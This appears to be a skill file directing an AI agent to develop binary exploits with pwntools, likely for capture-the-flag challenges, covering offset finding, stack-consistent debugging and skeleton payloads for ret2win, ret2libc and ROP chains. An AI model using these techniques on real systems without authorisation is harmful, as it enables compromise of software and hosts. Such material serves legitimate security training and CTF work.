| name | exploit-development |
| description | Develop working exploits using pwntools. Includes exploit template and common patterns. |
Exploit Development
Build working exploits based on vulnerability analysis.
Exploit Development Process
- Start from template - Use
templates/exploit.py - Find offset - Use cyclic pattern
- Identify target - Win function, ROP chain, shellcode
- Handle mitigations - Leak addresses if needed
- Build payload - Padding + control flow hijack
- Test locally - With and without GDB
- Test remote - Adjust for remote environment
Stack Consistency (CRITICAL)
Always use fixed argv[0] and empty environment:
ARGV0 = "/pwn"
ENV = {}
def conn():
if args.GDB:
return gdb.debug([EXECUTABLE], env=ENV, argv=[ARGV0], gdbscript='...')
else:
return process([EXECUTABLE], env=ENV, argv=[ARGV0])
This ensures stack addresses match between normal run and GDB debug.
Finding Offset
# Generate pattern
from pwn import cyclic, cyclic_find
payload = cyclic(200)
# After crash, find offset
# In GDB: cyclic -l 0x61616168
offset = cyclic_find(0x61616168)
Common Payload Patterns
Simple ret2win
payload = b'A' * offset
payload += p64(win_addr)
ret2win with alignment
payload = b'A' * offset
payload += p64(ret_gadget) # 16-byte alignment
payload += p64(win_addr)
ret2libc
payload = b'A' * offset
payload += p64(ret_gadget)
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)
ROP with pwntools
rop = ROP(elf)
rop.call('function', [arg1, arg2])
payload = b'A' * offset + rop.chain()
Debugging Tips
context.log_level = 'debug'for verbose outputgdb.attach(p)to attach to running processpause()to stop and inspect- Print addresses:
print(f"addr: {hex(addr)}")
Output
Produce exploit.py using the template.